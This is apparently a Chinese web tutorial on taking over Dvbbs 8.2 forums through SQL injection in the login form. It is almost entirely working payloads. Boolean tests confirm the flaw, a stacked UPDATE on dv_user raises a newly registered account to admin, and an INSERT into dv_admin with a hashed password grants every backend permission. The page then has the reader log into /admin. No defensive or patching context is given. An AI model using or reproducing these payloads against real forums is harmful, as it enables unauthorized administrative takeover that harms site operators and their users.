(动态论坛8.2)
先注册一个账户
然后退出账户登陆,在登陆框尝试注入(1)登录:san’ and ‘a’=’a 密码:1234567 (2)登录:san’ and ‘a’=’b,密码:1234567
提示错误,注入生效,再次注入';update dv_user set usergroupid=1 where username='san'--
(进行提权)
注入完成后,登陆刚开始注册的账号,从管理权限可以看出已经是前台管理权限了
再次推出登陆,
使用以下语句登录,密码为正确密码:san';insert into dv_admin (username,password,flag,adduser) values('san','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','san')--【注意:49ba59abbe56e057是123456的cmd16位密文
打卡管理员网址xxx.xx.xx.x/admin
用注册的账户进行登陆,发现成功提权后台管理
网友评论